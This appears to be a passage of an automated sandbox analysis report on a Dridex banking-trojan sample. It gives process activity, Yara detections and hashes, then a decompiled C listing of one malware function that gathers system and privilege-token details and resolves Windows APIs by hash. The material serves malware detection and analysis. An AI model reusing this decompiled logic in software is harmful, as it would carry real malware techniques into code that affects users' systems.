Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000000.642318739.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000002.687730478.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000C.00000000.653718345.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6552 Parent PID: 3104

General

Start time:	05:16:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',GetICifFileFromFile
Imagebase:	0xfe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000E.00000000.666915392.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000E.00000000.654050879.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000E.00000002.683460659.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5532 Parent PID: 6256

General

Start time:	05:17:50
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4708 Parent PID: 3192

General

Start time:	05:18:00
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 3340 Parent PID: 6488

General

Start time:	05:18:01
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6188 Parent PID: 6552

General

Start time:	05:18:06
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5060 Parent PID: 6256

General

Start time:	05:18:07
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 4800 Parent PID: 3192

General

Start time:	05:18:14
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5356 Parent PID: 6488

General

Start time:	05:18:14
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 460 Parent PID: 6552

General

Start time:	05:18:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652
Imagebase:	0xdf0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 6408 Parent PID: 4784 rundll32.exeCOMMON

Executed Functions

Function 6E9F0754, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E9F0754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e9fd1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E6E9F35F4(0x30);
					 *0x6e9fd1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E9F3670(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E9F3044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e9fd1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E9F101C(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e9fd1f8 + 0xb)) = _t162;
					_t363 = E6E9F3044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e9fd1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E9F0754(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e9fbce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E9EF5A8(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E9EF84C(_t429 + 0x24, E6E9EF4F0(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E9EF4E0(_t429 + 0x24, E6E9EF4F0(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E9F5558(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E9EF678(_t429 + 0x20);
							E6E9F5588(_t429 + 8, _t429 + 0x1c0, 0x5e9822cf);
							_t180 = E6E9F583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E9EDFDC(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E9F5588(_t429 + 8, _t429 + 0x1c8, 0x80c4a2b7);
								_t420 = E6E9F583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E9EDFDC(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E9F5588(_t429 + 8, _t429 + 0x1d0, 0xa89c042f);
								_t401 = E6E9F583C(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E9EDFDC(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E9ED020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E9F5530(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E9ED020(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E9F5530(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E9ED020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E9F5530(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E9ED020(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E9F5530(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E9ED020(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E9F5530(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E9ED020(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E9F5530(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e9fd1f8 + 0x24)) = _t189;
							_t190 = E6E9F1054(0xffffffffffffffff);
							_t320 =  *0x6e9fd1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e9fd1f8 + 0x2c)) = E6E9F10C8(0xffffffffffffffff);
								L78:
								if(E6E9F3044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e9fd1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E9F3044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e9fd1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E9F35C8(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E9F3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E9F35C8(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E9EF5A8(_t429 + 0x18c, _t206);
								_t411 = E6E9F3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E9EF678(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E9EF4E0(_t429 + 0x18c, 0);
								_t213 = E6E9EF4F0(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E9F35C8(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E9EF4E0(_t429 + 0x18c, 0);
								E6E9EDF84(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E9F3044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E9EDFF8(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E9F3044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E9EE0A4(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E9F4FD4( *((intOrPtr*)(_t429 + 0x1b8)), E6E9EE8D4( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E9EDFDC(_t429 + 0x1b8);
								E6E9EDFDC(_t429 + 0x1b0);
								E6E9EF678(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E9EBB88(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e9fd1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E9EBB88(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E9F35C8(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E9F3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E9F35C8(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E9EF5A8(_t429 + 0x3c, _t262);
						_t265 = E6E9F3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E9EF678(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E9EF4E0(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E9EF4F0(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E9F35C8(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E9EF4E0(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E9F3044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E9F35C8(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E9F0FF8(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E9F3044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E9F0FF8(_t403, _t413, _t403);
								}
								E6E9EF678(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E9EBB88(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E9EBB88(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e9f0763
0x6e9f0765
0x6e9f076c
0x6e9f0feb
0x6e9f0ff1
0x6e9f0ff1
0x6e9f0776
0x6e9f0782
0x6e9f078e
0x6e9f0793
0x6e9f07a0
0x6e9f07b1
0x6e9f07b3
0x6e9f07b4
0x6e9f07b5
0x6e9f07b5
0x6e9f07b6
0x6e9f07ba
0x6e9f07be
0x6e9f07c3
0x6e9f07c6
0x6e9f07cc
0x6e9f07e6
0x6e9f07ed
0x6e9f07f0
0x6e9f07f3
0x6e9f07f5
0x6e9f0801
0x6e9f080e
0x6e9f081b
0x6e9f081f
0x6e9f08ab
0x6e9f08ab
0x6e9f08ad
0x6e9f08b1
0x6e9f08bc
0x6e9f08d2
0x6e9f08d5
0x6e9f08d5
0x6e9f08d9
0x6e9f08e2
0x6e9f08e7
0x6e9f08e7
0x6e9f08e9
0x6e9f08fa
0x6e9f091c
0x6e9f091e
0x6e9f091f
0x6e9f0923
0x6e9f0923
0x6e9f092c
0x6e9f0938
0x6e9f0941
0x6e9f0957
0x6e9f0967
0x6e9f096c
0x6e9f0970
0x6e9f0975
0x6e9f0977
0x6e9f09c7
0x6e9f09dc
0x6e9f09e0
0x6e9f09e5
0x6e9f09f6
0x6e9f0a0b
0x6e9f0a0f
0x6e9f0a14
0x6e9f0a16
0x6e9f0a5d
0x6e9f0a60
0x6e9f0aae
0x6e9f0ab1
0x6e9f0af2
0x6e9f0af6
0x6e9f0afb
0x6e9f0b00
0x6e9f0b1f
0x6e9f0b1f
0x6e9f0b1f
0x6e9f0b21
0x00000000
0x6e9f0b21
0x6e9f0b02
0x6e9f0b06
0x6e9f0b08
0x6e9f0b0f
0x6e9f0b0f
0x6e9f0b15
0x6e9f0b15
0x6e9f0b17
0x6e9f0b1a
0x6e9f0b1a
0x00000000
0x6e9f0b17
0x6e9f0b0a
0x6e9f0b0d
0x6e9f0b13
0x6e9f0b13
0x00000000
0x6e9f0b13
0x00000000
0x6e9f0b0d
0x6e9f0ab3
0x6e9f0ab6
0x00000000
0x00000000
0x6e9f0abc
0x6e9f0ac1
0x6e9f0ac6
0x6e9f0ae5
0x6e9f0ae5
0x6e9f0aef
0x00000000
0x6e9f0aef
0x6e9f0ac8
0x6e9f0acc
0x6e9f0ace
0x6e9f0ad5
0x6e9f0ad5
0x6e9f0adb
0x6e9f0adb
0x6e9f0add
0x6e9f0ae0
0x6e9f0ae0
0x00000000
0x6e9f0add
0x6e9f0ad0
0x6e9f0ad3
0x6e9f0ad9
0x6e9f0ad9
0x00000000
0x6e9f0ad9
0x00000000
0x6e9f0ad3
0x6e9f0a62
0x6e9f0a64
0x6e9f0aa3
0x6e9f0aa6
0x6e9f0e18
0x6e9f0e1d
0x6e9f0e22
0x6e9f0e41
0x6e9f0e41
0x6e9f0e4b
0x00000000
0x6e9f0e4b
0x6e9f0e24
0x6e9f0e28
0x6e9f0e2a
0x6e9f0e31
0x6e9f0e31
0x6e9f0e37
0x6e9f0e37
0x6e9f0e39
0x6e9f0e3c
0x6e9f0e3c
0x00000000
0x6e9f0e39
0x6e9f0e2c
0x6e9f0e2f
0x6e9f0e35
0x6e9f0e35
0x00000000
0x6e9f0e35
0x00000000
0x6e9f0e2f
0x00000000
0x6e9f0aac
0x6e9f0a6a
0x6e9f0a6f
0x6e9f0a74
0x6e9f0a93
0x6e9f0a93
0x6e9f0a9d
0x00000000
0x6e9f0a9d
0x6e9f0a76
0x6e9f0a7a
0x6e9f0a7c
0x6e9f0a83
0x6e9f0a83
0x6e9f0a89
0x6e9f0a89
0x6e9f0a8b
0x6e9f0a8e
0x6e9f0a8e
0x00000000
0x6e9f0a8b
0x6e9f0a7e
0x6e9f0a81
0x6e9f0a87
0x6e9f0a87
0x00000000
0x6e9f0a87
0x00000000
0x6e9f0a81
0x6e9f0a18
0x6e9f0a1a
0x00000000
0x00000000
0x6e9f0a24
0x6e9f0a29
0x6e9f0a2e
0x6e9f0a4d
0x6e9f0a4d
0x6e9f0a57
0x00000000
0x6e9f0a57
0x6e9f0a30
0x6e9f0a34
0x6e9f0a36
0x6e9f0a3d
0x6e9f0a3d
0x6e9f0a43
0x6e9f0a43
0x6e9f0a45
0x6e9f0a48
0x6e9f0a48
0x00000000
0x6e9f0a45
0x6e9f0a38
0x6e9f0a3b
0x6e9f0a41
0x6e9f0a41
0x00000000
0x6e9f0a41
0x00000000
0x6e9f0a3b
0x6e9f097d
0x6e9f0982
0x6e9f0987
0x6e9f09a6
0x6e9f09a6
0x6e9f09b0
0x00000000
0x6e9f09b0
0x6e9f0989
0x6e9f098d
0x6e9f098f
0x6e9f0996
0x6e9f0996
0x6e9f099c
0x6e9f099c
0x6e9f099e
0x6e9f09a1
0x6e9f09a1
0x00000000
0x6e9f099e
0x6e9f0991
0x6e9f0994
0x6e9f099a
0x6e9f099a
0x00000000
0x6e9f099a
0x00000000
0x6e9f08be
0x6e9f08c0
0x6e9f0b25
0x6e9f0b2a
0x6e9f0b2d
0x6e9f0b32
0x6e9f0b34
0x6e9f0b49
0x6e9f0b4c
0x6e9f0c1a
0x6e9f0c22
0x6e9f0c25
0x6e9f0c3a
0x6e9f0c44
0x6e9f0c44
0x6e9f0c46
0x6e9f0c48
0x6e9f0c57
0x6e9f0c63
0x6e9f0c67
0x6e9f0c6a
0x6e9f0c6d
0x6e9f0c70
0x00000000
0x6e9f0c70
0x6e9f0b5c
0x6e9f0b6e
0x6e9f0b72
0x6e9f0bfe
0x6e9f0bfe
0x6e9f0c04
0x6e9f0c0f
0x6e9f0c06
0x6e9f0c06
0x6e9f0c06
0x00000000
0x6e9f0c04
0x6e9f0b7f
0x6e9f0b80
0x6e9f0b82
0x6e9f0b88
0x6e9f0fd7
0x6e9f0fdc
0x6e9f0fde
0x00000000
0x00000000
0x6e9f0fe4
0x6e9f0b9f
0x6e9f0ba3
0x6e9f0ba8
0x6e9f0bba
0x6e9f0bbe
0x6e9f0bc9
0x6e9f0bca
0x6e9f0bcb
0x6e9f0bcc
0x6e9f0bce
0x6e9f0bd9
0x6e9f0e51
0x6e9f0e51
0x6e9f0bd9
0x6e9f0bdf
0x6e9f0be8
0x6e9f0e63
0x6e9f0e79
0x6e9f0e7b
0x6e9f0e7d
0x6e9f0fb8
0x6e9f0fbf
0x00000000
0x6e9f0fbf
0x6e9f0e8c
0x6e9f0e9a
0x6e9f0eb4
0x6e9f0eb6
0x6e9f0eb8
0x6e9f0fc9
0x6e9f0fce
0x6e9f0fd0
0x00000000
0x00000000
0x6e9f0fd2
0x6e9f0ecc
0x6e9f0ed7
0x6e9f0ee6
0x6e9f0ef8
0x6e9f0efa
0x6e9f0efc
0x6e9f0f09
0x6e9f0f09
0x6e9f0f19
0x6e9f0f2a
0x6e9f0f2f
0x6e9f0f31
0x6e9f0f33
0x6e9f0f3a
0x6e9f0f3b
0x6e9f0f3b
0x6e9f0f47
0x6e9f0f68
0x6e9f0f71
0x6e9f0f7d
0x6e9f0f89
0x6e9f0f8e
0x6e9f0f93
0x6e9f0f99
0x6e9f0f99
0x6e9f0f9e
0x6e9f0fa4
0x00000000
0x6e9f0faa
0x6e9f0fac
